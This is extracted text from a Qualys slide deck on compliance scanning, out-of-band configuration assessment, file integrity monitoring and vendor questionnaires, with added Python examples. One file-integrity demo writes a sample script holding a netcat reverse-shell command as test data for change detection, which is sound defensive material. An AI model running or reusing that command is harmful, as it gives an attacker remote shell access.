Agenda


Configuration and File Integrity Assessment 


Address compliance objectives in a unified way


Qualys Compliance solutions with demo 
Policy Compliance 
Out-of-band Configuration Assessment 
File Integrity Monitoring 


Security Assessment Questionnaire 


Discussion, Q&A 


Compliance Requirements 
for Any Mandate or Policy 


Inventory System and Software 
(Authorized, not EOLed) 


Process and Vendor Risk 
Security Configurations 


Continuous Vulnerability 
Management 


Review Rights & Permissions 


Monitoring of Critical Files 




TOP 5 CIS 
CONTROLS 


CSC 1: 


Inventory of Authorized 
and Unauthorized Devices. 


CSC 2: 


Inventory of Authorized 
and Unauthorized 
Software. 


CSC 3: 


Secure Configurations for 
Hardware and Software on 
Mobile Devices, Laptops, 
Workstations and Servers. 


CSC 4: 


Continuous Vulnerability 
Assessment and 
Remediation. 


CSC 5: 


Controlled Use of 
Administrative Privileges. 
DEMO


Unified Compliance Dashboard — 
Example of ISO Compliance 
Policy Compliance


Continuous Configuration and Compliance Management 


Assessment Beyond 
Vulnerabilities 


CVE based vulnerability 
Known Asset based 
Ad-hoc Patching 


Configuration/Hardening 
assessment 

Hardening controls 
assessment 

Track Certificates, EOL/EOS 
per host 


Auto-discover unknown 
software/apps 

Track what critical objects 
are changing 

Vendor risk assessment
Compliance as a by-product


Automated Patch 
management 
Automated Config 
failure remediation 
Continuous 
Middleware 
discovery & 
assessment 


MongoDB — We don't track 
misconfigurations! 

MongoDB server leaks data of 

nearly 700,000 Amex India customers 


Everyone is loving Docker! I don't 
know where they're running. 


ElasticSearch — We have this in our 
environment? 


Why 3,000+ Customers Use 
Qualys Policy Compliance 


Data collection options through multiple sensors 


Technology and content coverage 


Platform features: Regulatory Reporting, APIs, Trending 


Discovery and Remediation 
Compliance Delivered Through Multiple Sensors


Physical 


Legacy data centers 
Corporate infrastructure 


Continuous security and 
compliance scanning 




Virtual 


Private cloud 
infrastructure 


Virtualized Infrastructure 


Continuous security and 
compliance scanning 




Cloud/Container 


Commercial IaaS & PaaS clouds


Pre-certified in market 
place 


Fully automated with API 
orchestration 


Continuous security and 
compliance scanning 




Cloud Agents 


Light weight, multi- 
platform 


On premise, elastic 
cloud & endpoints 


Real-time data collection 


Continuous evaluation 
on platform for security 
and compliance 


Out of band 


Push asset and config data instead of Qualys pulling it


Use same signatures for 
evaluating this data 




API 


Integration with Threat 
Intel feeds 


CMDB Integration 


Log connectors 
Technology Coverage

Network Devices/Databases
Middleware Technologies
Operating Systems
Emerging Technologies/Engineering Technologies
Containerized Technologies

[Vendor logos on the slide; the legible ones include Solaris, Linux, VMware, Apache, Ceph, Elastic, Kafka and Redis.]

Inventory/Discovery Information
Control & Compliance Content Coverage


Easy customization of values through UI 

Over 140 versions of 75+ technologies 

270+ CIS policies, 70+ best practice policies 

20+ mandates for out of box reporting 

Experienced Team, contributing/Authoring the CIS benchmarks 


Vendor- or guideline-provided commands are not imported directly; checks are re-implemented and optimized for scalability, error handling and default values
Policy Compliance feature advantages


Customization 
Database Custom scripts/controls 
User Defined controls (UDCs) — Hash-based FIM, Shares, Password audits, WMI, File content 


Discovery 
Auto-discovery of middleware technologies for configuration and vulnerability assessment 


Reporting 


Compliance trending, Custom dashboard and API/Integration support 


Remediation 
Automated remediation for config failure 
New


PC UI: Asset Compliance & Control 


Compliance Views 
Policy Compliance

[Screenshot: Policy Compliance UI (Dashboard, Policies, Scans, Reports, Exceptions, Assets, Users). The Reports view is filtered by posture (Pass 3.01K, Failed 982, Error 651), criticality (Urgent, Critical, Moderate, None), mandate (PCI-DSS, NIST-CSF, NIST Special Publication, ISO/IEC, HITRUST and more), type (Compliance, SCAP), label (DISA STIG and others), locked status and active/inactive status.]

Search Option

Controls search: Mandate.name like '%fedramp mod%' AND asset tagName='USproduction' AND control.status='failed'

Asset search: asset tagName='USproduction'

[Screenshot: Control Compliance Trending and Asset Compliance Trending widgets (passing vs. failing over time), a control list with status, CID, statement, criticality and asset count, for example:
Failed | CID 5572 | Current list of installed patches from the manufacturer (Microsoft) | Critical | 348 assets
Failed | CID 5240 | Status of the 'Devices: Allowed to format and eject removable media' setting (NTFS formatted devices) | Critical | 732 assets
Failed | CID 1052 | Current list of ORACLE accounts having access to the PERFSTAT.STATS$SQL_SUMMARY table | 196 assets
Failed | CID 1059 | Status of the 'Indexing' service | Critical | 241 assets
and an asset list with asset name, OS, tracking method (Agent), last scanned date, control count and compliance %.]


Top 4/4 US banks want to use custom DB controls


Define Database Query (read only), 
Customizable by DB Version 


Provide static information 


Set a query to return tabular data to 
evaluate (which can include evidence) 


Use Policy Editor to define Expected value 
from the returned Query result to Pass/Fail a 
database control 


[Screenshot: DB control editor. Load Scan Data, Row Selection, technology Microsoft SQL Server 2017, Evaluation Criteria: Matches Column Criteria, criteria data types Boolean and String, Add Criteria.]
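The workflow above, modelled as an added Python example (not Qualys code): a read-only query returns tabular rows that double as evidence, and an expected-value criterion is evaluated against one column to decide Pass/Fail. SQLite in memory stands in for the database; the principals table, the sysadmin query and the allowed-account list are constructed assumptions, not a real SQL Server view or a Qualys control. It also shows the read-only guarantee the slide calls for: the collector's connection is locked with PRAGMA query_only, so a control query cannot modify the audited database.

```python
import sqlite3
from dataclasses import dataclass, field

# Constructed sample data: a stand-in for SQL Server's server principals and
# their role membership. (Assumption for illustration; not real server data.)
SAMPLE_ROWS = [
    ("sa", "sysadmin", 1),
    ("svc_backup", "sysadmin", 0),
    ("dba_alice", "sysadmin", 0),
    ("app_web", "db_datareader", 0),
]


@dataclass
class ControlResult:
    status: str                                     # "Passed" or "Failed"
    evidence: list = field(default_factory=list)    # every row the query returned
    violations: list = field(default_factory=list)  # rows that broke the criterion


def open_readonly_db():
    """Open an in-memory SQLite DB, load the sample table, then lock it.
    PRAGMA query_only makes any write fail, which is the property a DB UDC
    collector should have: it can only SELECT."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE principals(name TEXT, role TEXT, is_disabled INTEGER)")
    conn.executemany("INSERT INTO principals VALUES (?,?,?)", SAMPLE_ROWS)
    conn.commit()
    conn.execute("PRAGMA query_only = 1")
    return conn


def run_control_query(conn, query, params=()):
    """Run the control's query; return (column_names, rows) as evidence."""
    if not query.lstrip().upper().startswith("SELECT"):
        raise ValueError("UDC queries must be read-only SELECT statements")
    cur = conn.execute(query, params)
    columns = [d[0] for d in cur.description]
    return columns, cur.fetchall()


def evaluate_column_criteria(columns, rows, column, allowed):
    """'Matches Column Criteria': every returned row's <column> must be in the
    allowed set; offending rows are kept so the auditor sees why it failed."""
    idx = columns.index(column)
    violations = [r for r in rows if r[idx] not in allowed]
    return ControlResult("Passed" if not violations else "Failed", rows, violations)


# Hypothetical control: "Current list of logins holding the sysadmin role",
# expected value: only 'sa' and 'dba_alice' may hold it.
SYSADMIN_QUERY = "SELECT name, is_disabled FROM principals WHERE role = ?"
EXPECTED_SYSADMINS = {"sa", "dba_alice"}


def check_sysadmin_membership(allowed=EXPECTED_SYSADMINS):
    conn = open_readonly_db()
    cols, rows = run_control_query(conn, SYSADMIN_QUERY, ("sysadmin",))
    return evaluate_column_criteria(cols, rows, "name", allowed)


def write_attempt_is_blocked():
    """Show that the collector's connection cannot modify data."""
    conn = open_readonly_db()
    try:
        conn.execute("UPDATE principals SET is_disabled = 1 WHERE name = 'sa'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    result = check_sysadmin_membership()
    print(result.status, "evidence:", result.evidence, "violations:", result.violations)
    print("write blocked:", write_attempt_is_blocked())
```

Keeping the full result set as evidence, not just the verdict, is what lets a failed control be explained to an auditor (and lets a false positive be resolved by adding an account to the expected value rather than editing the query).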
DEMO

Policy Compliance | DB custom control building, con


Feature Roadmap 


Q2 2019 


Database UDC support for Oracle, MSSQL and MongoDB 
Non-root ‘scanning’ for UDCs (scanner) — File content, 
Permissions/ownership 
Auto-discovery and auto auth record support for Sybase, Tomcat, JBoss, WebSphere
PC Data in Elastic Cluster for data querying 


Q3 2019 


Auto-remediation support through agent 
Middleware support through agent 
(Qweb, Portal, Agents) 
Support for ‘running commands' UDC 


Q2 2019 


File Content Search Windows UDC on Agent 
‘Scan by Policy’ support through Agents 
Inventory and discovery data for ITAM 
Backend work for Middleware tech (web servers) support through Agents
Out-of-band Configuration Assessment (OCA)


Make your Inaccessible, Sensitive Assets visible to your 
Vulnerability and Compliance Program 


Two of the biggest banks in Asia are using OCA


Disconnected/Inaccessible systems to be 
a part of overall Vulnerability, Risk and 
Compliance program 


Sensitive Systems/Regulated Devices 
Legacy Systems 

Highly locked down systems 
Network Appliances 


Current options:
Manual: screenshots, ad-hoc scripts
Limited software-based support

Extreme ExtremeXOS
FireEye
Fortigate FortiOS
HP ProCurve
Huawei VRP
Juniper Junos
NetApp Data ONTAP
SonicWALL SonicOS
Out-of-Band Configuration Assessment (OCA)

Add-on to VM/PC

Use/create your own scripts to collect and push the data

Support for Inventory, Policy Compliance and/or Vulnerability Assessment

Platform creates a snapshot and signatures work on this data

[Screenshot: OCA asset list showing IP, technology (e.g. FireEye CM, Cisco IOS, Cisco UCS Server), severity, computer name, network and last update date (Apr 11, 2018).]
4 Easy steps to push data to Qualys (API/UI)

1. Provision the asset
2. Upload the vulnerability/configuration data
3. Qualys creates an agent-based data snapshot
4. Use vuln IDs / controls and policies for report generation

ASSET PROVISIONING

POST http://{{base_url}}/oca/v1.0/asset

GET http://swarmm01.p17.eng.sic01.qualys.com:53670/oca/v1.0/asset/03df1879-458c-495d-873d-7ab2daa34045/commands/PolicyCompliance

Response (the commands the platform needs output for; these are Brocade Fabric OS commands):

{
  "code": 200,
  "data": {
    "items": [
      "version",
      "tsclockserver",
      "configshow -all",
      "syslogdipshow"
    ]
  }
}

COMMAND OUTPUT UPLOAD

POST http://{{base_url}}/oca/v1.0/asset/03df1879-458c-495d-873d-7ab2daa34045/command/output/{{type}}

Body (form-data), one key per command:

configshow -all   (uploaded as a file)
syslogdipshow     syslog.1 10.170.65.31
tsclockserver     Active NTP Server 10.170.158.12
version           Kernel: 2.6.14.2 ...
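The exchange above, as an added Python example (not Qualys code): parse the command list the platform hands out, refuse to upload until every command has captured output, build the form body keyed by the exact command strings, and optionally POST it. The asset ID and the command list are the ones on the slide; the base URL, the Authorization header value and the placeholder text for the configshow dump are assumptions, and the network function is not exercised offline.

```python
import json
import urllib.parse
import urllib.request

# Constructed sample: the JSON the platform returned on the slide for
# GET /oca/v1.0/asset/{asset_id}/commands/PolicyCompliance.
SAMPLE_COMMANDS_RESPONSE = json.dumps({
    "code": 200,
    "data": {"items": ["version", "tsclockserver", "configshow -all", "syslogdipshow"]},
})

# Constructed sample: output an operator's own collection script captured from the
# switch, keyed by the exact command string. Values follow the slide; the
# configshow dump is a placeholder (assumption).
SAMPLE_DEVICE_OUTPUT = {
    "version": "Kernel: 2.6.14.2 ...",
    "tsclockserver": "Active NTP Server 10.170.158.12",
    "configshow -all": "<constructed placeholder for the full configshow -all dump>",
    "syslogdipshow": "syslog.1 10.170.65.31",
}


def parse_required_commands(response_text):
    """Step 2a: read the command list the platform expects output for."""
    body = json.loads(response_text)
    if body.get("code") != 200:
        raise RuntimeError("unexpected response code: %r" % body.get("code"))
    items = body.get("data", {}).get("items") or []
    if not items:
        raise RuntimeError("no commands defined for this asset/type")
    return list(items)


def missing_commands(required, outputs):
    """Commands with no (non-blank) captured output. A partial upload leaves the
    controls that depend on the missing command unevaluable, so the collector
    should refuse to push until every command has output."""
    return [cmd for cmd in required if not (outputs.get(cmd) or "").strip()]


def build_output_form(required, outputs):
    """Step 2b: the form body for POST .../command/output/{type}: one field per
    command, keyed by the exact command string the platform handed out, in the
    platform's order. Extra captured commands are dropped."""
    missing = missing_commands(required, outputs)
    if missing:
        raise ValueError("missing output for: %s" % ", ".join(missing))
    return {cmd: outputs[cmd] for cmd in required}


def commands_url(base_url, asset_id, data_type):
    return "%s/oca/v1.0/asset/%s/commands/%s" % (
        base_url.rstrip("/"), urllib.parse.quote(asset_id), data_type)


def command_output_url(base_url, asset_id, data_type):
    return "%s/oca/v1.0/asset/%s/command/output/%s" % (
        base_url.rstrip("/"), urllib.parse.quote(asset_id), data_type)


def push_command_output(base_url, asset_id, data_type, outputs, auth_header,
                        opener=None):
    """Steps 2a+2b end to end over HTTP. Not run offline. auth_header is an
    assumption: the slide does not show how the API authenticates, so pass the
    Authorization header value your tenant uses."""
    opener = opener or urllib.request.build_opener()
    headers = {"Authorization": auth_header}
    req = urllib.request.Request(commands_url(base_url, asset_id, data_type), headers=headers)
    with opener.open(req) as resp:
        required = parse_required_commands(resp.read().decode("utf-8"))
    form = build_output_form(required, outputs)
    data = urllib.parse.urlencode(form).encode("utf-8")
    req = urllib.request.Request(
        command_output_url(base_url, asset_id, data_type), data=data,
        headers={**headers, "Content-Type": "application/x-www-form-urlencoded"},
        method="POST")
    with opener.open(req) as resp:
        return resp.status, resp.read().decode("utf-8")


if __name__ == "__main__":
    required = parse_required_commands(SAMPLE_COMMANDS_RESPONSE)
    print("platform needs:", required)
    print("form fields:", list(build_output_form(required, SAMPLE_DEVICE_OUTPUT)))
```

The slide uploads configshow -all as a file in a multipart form; this script sends every output as an inline urlencoded field, which is one of the body types the slide's client lists, but whether the endpoint accepts large dumps that way is an assumption, not something the slide confirms. Fetching the command list before collecting, rather than hard-coding it, is the point: when the platform's signatures change, the collector learns the new command set without a code change.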
DEMO

Out-of-Band Configuration Assessment (OCA)


Technology Support

v1.0 release (March 2019):
FireEye Appliances
Storage Devices
Brocade DCX Switch
Acme Packet Net
Imperva Firewall
Cisco Wireless LAN Controller
Cisco UCS Server
NetApp ONTAP
Juniper IVE
Tandem - HP Guard

Future priorities:
AS/400
Cisco Meraki
Sonic Firewall
Aruba WLC
Dell EMC Data Domain
Oracle Tape Library
Arista
Availability & Roadmap

December 2018:
v0.9 release for limited customers
API-based asset and config data upload for PC

March 2019:
UI-based data upload for PC
Bulk asset data upload (CSV)
Integration with AssetView

May 2019:
Extend support to VM
Support OCA for AS/400 compliance

Q2 2019:
Possible SDK route
Expand platform coverage
CMDB integration
FIM integration
File Integrity Monitoring


Monitor and manage critical file changes in real time


Traditional FIM 
challenges 


Expensive Infrastructure to deploy and 
maintain 


Lack of scalable solution with quick time 
to value 


Depth of monitoring & High volume of 
changes 


Requires intelligence about the changes 


Solution in silo, another 
agent/platform/Asset management 


Agent Modules

[Screenshot: Cloud Agent module list with tags; text not legible.]
100+ Customers have chosen Qualys FIM within its first year

Built on the same Qualys Cloud Agent

Real-time detection for high volume, high scale

Nothing to install, easy to configure, quick win

Intelligence about the changes

Flexible APIs for external integration

Elastic query based automated incident management and alerting**

[Screenshot: FIM dashboard widgets: Events by Vulnerabilities, Events by Monitoring Profiles, Events by Top 5 Processes.]
How a top credit reporting agency uses Qualys FIM


Started quickly with ‘out-of-the-box’ monitoring 
profiles 


Centrally managing events and creating Incidents 


Analyzing file changes with metadata 
(Correlate, track and Alert for change incidents**) 


Searching, Filtering, Tracking through Elastic Queries 
and dashboards 


Incident Reports for auditors 


FIM APIs for Integration with centralized DWH 


[Screenshot: FIM Incident Report with incident name, change type, disposition and report statistics (changes by action, events by severity).]
What Customers are Monitoring


Critical Operating System Binaries 
OS and Application Configuration Files 


Content, such as Web source, custom 
critical files 


Permissions/Security Attributes (such as 
on Database Stores, log files) 


Security Data (Logs, Folder Audit 
Settings) 
View Details: TASKHOST.EXE-954DD3D2.pf

Event Alert: File Security

Changed on: 11 minutes ago (March 11, 2017 at 10:20:22 AM)
By user: .\KCtech
File path: \Device\HarddiskVolume2\Windows\System32\78296FB0-376B-497e-B012-9C450E187327-5P-0.C7483456-A289-439d-8115-601632D005A0
By process:

File Security
New Permission:
Old Permission:

Triggers
Monitoring Profile: Windows Profile - PCI
Sections and Rules: Section 1; Rulename.here1, Rulename.here2
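The event fields above (path, change type, old and new permission) and the hash-based FIM mentioned under user-defined controls, as an added Python example that is not Qualys code: a baseline snapshot of SHA-256 digests and permission strings, a second snapshot, and a diff that emits Create/Modify/Delete/Security events. The directory, the file names and the backdoor.sh script are constructed in a temporary directory for the demo.

```python
import hashlib
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass
class Event:
    path: str
    change_type: str   # Create, Modify, Delete or Security (permission change)
    old: str = ""      # previous digest or mode string
    new: str = ""      # current digest or mode string


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Baseline: {relative path: (sha256, permission string)} for every regular
    file under root. Symlinks and special files are skipped, so a symlink swap
    would not be noticed here; that is a limit of this model."""
    state = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            state[os.path.relpath(full, root)] = (sha256_file(full), stat.filemode(st.st_mode))
    return state


def diff(baseline, current):
    """Compare two snapshots and emit events. A content change and a permission
    change on the same file are separate events, matching the split between
    file-change and File Security events in the view above."""
    events = []
    for rel in sorted(current):
        digest, mode = current[rel]
        if rel not in baseline:
            events.append(Event(rel, "Create", new=digest))
            continue
        old_digest, old_mode = baseline[rel]
        if digest != old_digest:
            events.append(Event(rel, "Modify", old=old_digest, new=digest))
        if mode != old_mode:
            events.append(Event(rel, "Security", old=old_mode, new=mode))
    for rel in sorted(baseline):
        if rel not in current:
            events.append(Event(rel, "Delete", old=baseline[rel][0]))
    return events


def demo():
    """Constructed scenario in a temp dir: baseline three files, then append to
    sshd_config, chmod app.bin world-writable, drop a new script, delete grub.conf."""
    with tempfile.TemporaryDirectory() as root:
        files = {"grub.conf": b"default=0\n",
                 "sshd_config": b"PermitRootLogin no\n",
                 "app.bin": b"\x7fELF\x02\x01\x01"}
        for name, body in files.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(body)
        baseline = snapshot(root)

        with open(os.path.join(root, "sshd_config"), "ab") as f:
            f.write(b"PermitRootLogin yes\n")
        os.chmod(os.path.join(root, "app.bin"), 0o777)
        with open(os.path.join(root, "backdoor.sh"), "wb") as f:
            f.write(b"#!/bin/sh\nnc -e /bin/sh 10.0.0.1 4444\n")
        os.remove(os.path.join(root, "grub.conf"))
        return diff(baseline, snapshot(root))


if __name__ == "__main__":
    for ev in demo():
        print(f"{ev.change_type:8} {ev.path:12} old={ev.old[:12]} new={ev.new[:12]}")
```

Two things a snapshot comparison cannot give you, and which the event view above shows: who made the change (By user) and which process made it (by process). Those need a kernel-level audit source (auditd on Linux, object access auditing on Windows) feeding the agent, and polling also misses a file that is changed and restored between two snapshots. That is the gap between a hash-based UDC and real-time FIM.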


DEMO

File Integrity Monitoring (FIM)


FIM Roadmap: Agent Priorities 


Q2/Q3 2019 


Windows Registry Detection 
Network Device Configurations 
File content change comparison 
AuditD lockdown workarounds 
Process Tracking 


Future Consideration 
AIX 7.x 

Debian 7+ 

MacOS 

Solaris 


* Roadmap items are future-looking; timing and specifications may change
FIM Roadmap: Features

Q1 2019 (FIM API):
Incident List API
Incident-Event List API
Event Query API improvements
FIM Backend 1.1.2
Activation & Profile/Manifest Assignment improvements
Agent Health UI improvements
Tune from Event View
Initial Reporting: Change Incident Report
Monitoring Profile Editor Phase II
New Monitoring Baseline Profiles (Middleware)

Q2 2019 (May):
Incident Management UI & Workflow
FIM Management API features
External Change Control Integration (Splunk)
Expand Reporting: template based
Customizable Alerting and Notification, Incident Correlation

Q2 2019, 2.2 (June):
Process Whitelisting (for patch process)
Dashboard Expansion & AssetView Integration
Windows Registry Change Detection
Automated Incident Correlation
Basic Alerting and Notification

Q3 2019:
Show File Text Change Details (file change comparisons)
Monitoring Profile Import/Export
Streaming Event API
Full-fledged Patch Reconciliation for automated Incident management

* Roadmap items are future-looking; timing and specifications may change
Security Assessment Questionnaire


Automate the Vendor Risk Management (VRM) on the same platform 


Agenda 


How SAQ complements the Qualys technical security apps


Internal Procedural Controls Assessment

[Screenshot: SAQ Campaigns dashboard: 61 campaigns in total (Active 37, Complete 20, Inactive 3, Canceled 2; Overdue 57); workflow Full 16 and Simple 46; templates include GDPR demo, GDPR Third Party, ANSSI 40 Essential and Shared Assessments; campaign list with template, workflow, status and due date, for example Shared Assessments - Standard... FULL Completed Apr 25, 2019.]


Demo 


Roadmap 


Vendor Risk Challenges for a US Pharma company

Extend the perimeter to include vendors: security & vulnerability data collection

Vendor profiling based on the services

Vendor assessment based on criticality

Vendor control data aggregation with internal security and compliance data

Automated workflow, operational dashboards

[Table residue: example third-party breaches with columns Source of Attack, Financial Impact, Reputational Impact and Breach Origin. Legible rows: attackers stole credentials from a 3rd-party vendor to breach the network, $200 million in costs to date, direct third-party breach; attackers breached the network, estimated $2-3 billion; breach due to a 3rd-party vendor, estimated $3 billion in fraud charges; a 3rd-party HVAC vendor; Yahoo accounts hacked due to a 3rd-party database breach, impact TBD; T-Mobile.]
How they are addressing vendor risk


through SAQ 


Vendors Profiling — Defines 
Criticality based on Service 
areas/Cybersecurity domains 


$ Uses out-of-the-box 
content, including regional 
mandates 


Easy online workflow for the 
vendors, receives reminders, 
alerts and status 


QSC 2018: Virtual Edition


Assesses vendors per their 
risk profile, in a standardized 
(SIG) manner 


Dashboards the risk posed 
by the highly critical vendors 
and ranks them per risk 


Consolidates the vendor control 
posture with Internal procedural 
& technical compliance controls 
Rich Template Library


Industry 


PCI DSS SAQ A, B, C, D 
IT for SOX 

GLBA 

BASEL 3 (IT) 

HIPAA 

HITRUST 

NERC CIP v5 

SWIFT 

NERC CIP 


Popular Standards 


ISO 27001-2013 ISMS 
NIST CSF 

COBIT 5 

FedRAMP 

COSO 

ITIL 

CIS TOP 20 Controls 


Shared Assessments (SIG) vendor assessment


+ Includes premium content — Shared Assessments (SIG) 


+ Use as-is or customize to your needs 


Regional 


GDPR multiple templates 
Abu Dhabi Info Sec Standards 
ANSSI (France) 

MAS IBTRM (Singapore) 

NESA 

BSI Germany 

ISM (Australia) 

UK Data Protection 


RBI Guidelines (India) 
NCSC- Basic Cyber Security 
Controls 
(Saudi Arabia) 
California Privacy** 
Canada Data Protection 2018** 


Technical Services 


CSA CAIQ v3.0.1 
CSA CCM v3.0.1 


Vendor Security for Hosting 
Service Provider 


AWS ** 


Procedural controls for 
cloud, containers** 
Content Updates


- Shared Assessment (SIG) 2019 


- HITRUST updates 2018
- NCSC - Basic Cyber Security Controls (Saudi Arabia)
- PCI-DSS SAQs version 3.2, templates: A, A-EP, B, C, C-VT, D Service Provider, D Merchant, P2PE
- PCI-DSS SAQs version 3.2.1, templates: A, A-EP, B, C, C-VT, D Service Provider, D Merchant, P2PE


SAQ Roadmap 


Q4 2018:
Vendor-driven workflows to cater to customers
SAQ users/roles/privileges
Question Bank
Create template from library templates
New campaign UI

Q2 2019:
Vendor Risk Management workflows
Vendor onboarding, vendor risk profiling
Automated assessment based on vendor profiles/onboarding
Compare vendors based on risk scores

August 2019:
New role: Risk Analyst
Vendor bulk upload
Campaign scheduler
Risk register workflow
Risk scoring

* Roadmap items are future-looking; timing and specifications may change
Unique advantages of the Qualys Compliance solutions

Single platform for all compliance modules
Single agent: on premise, cloud, containerized
Broad technology coverage with industry-leading ready-to-use content
Auto-discovery of technologies for metadata
Create & run your own controls, templates, profiles
API and integration
Out of box compliance reporting (ISO, NIST, PCI, ADSIC, NESA and more)
Vendor Risk Management on the same platform
Thank You


Shailesh Athalye 
sathalye@qualys.com 


